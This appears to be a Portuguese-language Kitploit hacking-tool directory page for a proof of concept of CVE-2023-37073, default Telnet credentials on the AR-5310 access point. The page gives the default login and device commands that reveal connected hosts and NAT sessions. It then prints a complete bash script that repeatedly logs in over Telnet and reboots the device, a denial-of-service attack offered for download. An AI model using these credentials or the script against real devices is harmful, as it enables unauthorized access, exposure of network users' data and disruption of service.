Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-37073 — Credenciais padrão do Telnet podem levar à divulgação de informações e ataques de negação de serviço (DoS). | Kitploit
Ferramentas/GitHubGitHub/hamza0x/cve-2023-37073
Segurança IoTAtaques de SenhaExploraçãoColeta de InformaçõesSegurança de Hardware e IoT
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Credenciais padrão do Telnet podem levar à divulgação de informações e ataques de negação de serviço (DoS).

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-37073

Credenciais padrão do Telnet podem levar a divulgação de informações e ataques de negação de serviço (DoS).

Passos para reproduzir

Isso afeta o AP AR-5310

root@kitploit:~
  Telnet 192.168.1.1
  username:user
  password:user
  Then Boom ... You logged in 

Divulgação de informações através de credenciais padrão do Telnet

root@kitploit:~
    When you log in using Telnet service, 
    type the command 'help' or '?' to view    
    available options:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

root@kitploit:~
  To obtain the IP and MAC address of each device 
  connected to the network, run the command  
  'lanhosts'.
  To display all NAT sessions through the Access  
  Point (AP), 
  use the command 'nat show session'

Ataque DoS

root@kitploit:~
  To execute a Denial of Service (DoS) attack, 
  run the command 'reboot' to restart the AP. 
  I want to automate a script that will 
  consistently restart the AP.

Automatizar ataque DoS através de script shell

root@kitploit:~
#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
Baixar ferramenta